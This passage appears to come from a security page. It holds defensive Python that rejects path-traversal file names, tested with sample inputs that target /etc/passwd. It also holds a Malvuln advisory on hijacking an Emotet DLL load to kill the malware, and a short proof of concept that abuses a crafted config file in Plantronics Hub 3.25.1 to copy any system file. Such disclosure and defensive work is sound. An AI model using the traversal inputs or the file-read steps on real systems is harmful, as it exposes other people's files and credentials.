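<p>The OFBiz requests, the Cacti import_package() description and the CrushFTP scanner above all turn on the same defect: a name taken from the request is joined onto a base directory without rejecting ".." segments or absolute paths. The following Python example is added here and is not code from any of those projects; it shows a containment routine an import or download handler can apply before touching the filesystem: lexical normalisation that rejects escaping names, then a realpath check so that a symlink already inside the base directory cannot lead outside it, and an exclusive-create write so an existing file is never overwritten. The base directory and the sample names, modelled on the requests shown above, are constructed.</p>

```python
import os
import posixpath


class PathEscapeError(ValueError):
    """Raised when a request-supplied name would leave the intended directory."""


def safe_relpath(untrusted):
    """Lexically normalise a request-supplied file name and reject escapes.

    Accepts only a relative path that stays inside the base directory after
    resolving "." and ".." segments; both '/' and '\\' count as separators.
    """
    if not untrusted or "\x00" in untrusted:
        raise PathEscapeError("empty name or embedded NUL")
    name = untrusted.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise PathEscapeError("absolute path not allowed: %r" % untrusted)
    norm = posixpath.normpath(name)
    if norm == "." or norm == ".." or norm.startswith("../"):
        raise PathEscapeError("path escapes base directory: %r" % untrusted)
    return norm


def escapes(untrusted):
    """True when safe_relpath() would reject the name (handy for log triage)."""
    try:
        safe_relpath(untrusted)
    except PathEscapeError:
        return True
    return False


def resolve_under(base_dir, untrusted):
    """Second layer: resolve symlinks and confirm the target is still under base_dir."""
    rel = safe_relpath(untrusted)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, rel))
    if os.path.commonpath([base, target]) != base:
        raise PathEscapeError("symlink leads outside base directory: %r" % untrusted)
    return target


def write_package_file(base_dir, untrusted_name, data):
    """Write an uploaded package member only at a contained, newly created path."""
    target = resolve_under(base_dir, untrusted_name)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    # O_EXCL: never overwrite an existing file (no clobbering of application sources)
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return target


if __name__ == "__main__":
    # Constructed names modelled on the requests shown in the advisories above.
    for name in ("templates/host.xml",
                 "../../../../../../etc/passwd",
                 "?/../../../../../../../../../../etc/passwd",
                 "..\\..\\windows\\system32\\cmd.exe",
                 "/etc/passwd"):
        print("%-50s %s" % (name, "REJECTED" if escapes(name) else safe_relpath(name)))
```

<p>The lexical check alone is what the three affected handlers lacked; the realpath step is the part that survives a writable base directory containing a symlink, and rejecting rather than stripping ".." keeps a rejected request visible in logs instead of silently succeeding on a different path.</p>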
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: TrojanSpy.Win64.EMOTET.A<br />Vulnerability: Arbitrary Code Execution<br />Description: The malware looks for and executes an x64 "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded, the exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation: while written as a proof-of-concept specifically to defeat ransomware, it can also generate DLLs to try to exploit other types of malware. All basic tests were conducted successfully in a virtual machine environment.<br />Family: EMOTET<br />Type: PE64<br />MD5: f917c77f60c3c1ac6dbbadbf366ddd30<br />SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486c<br />Vuln ID: MVID-2024-0684<br />Disclosure: 05/14/2024<br /><br />Exploit/PoC:<br />1) Download RansomLord v3<br /> https://github.com/malvuln/RansomLord<br />2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)<br />3) Use the -g flag (Generate Exploit) to output an x64 CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.<br />4) (Optional) Use the -e flag to set up Windows event IOC logging in the registry; this will log the SHA256 hash, full path and filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read<br /># Date: 2024-05-10<br /># Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from Mastercard<br /># Vendor Homepage: https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895<br /># Version: Plantronics Hub for Windows version 3.25.1<br /># Tested on: Windows 10/11<br /># CVE : CVE-2024-27460<br /><br />As a regular user, drop a file called "MajorUpgrade.config" inside the<br />"C:\ProgramData\Plantronics\Spokes3G" directory. The content of<br />MajorUpgrade.config should look like the following one-liner:<br />^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config<br /><br />Replace <FULL-PATH-TO-YOUR-DESIRED-FILE> with the file to read/copy<br />(any file on the system). The file will be copied into<br />C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp<br /><br />Steps to reproduce (POC):<br />- Open cmd.exe<br />- Navigate using cd C:\ProgramData\Plantronics\Spokes3G<br />- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config<br />- The desired file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp<br /><br /></code></pre>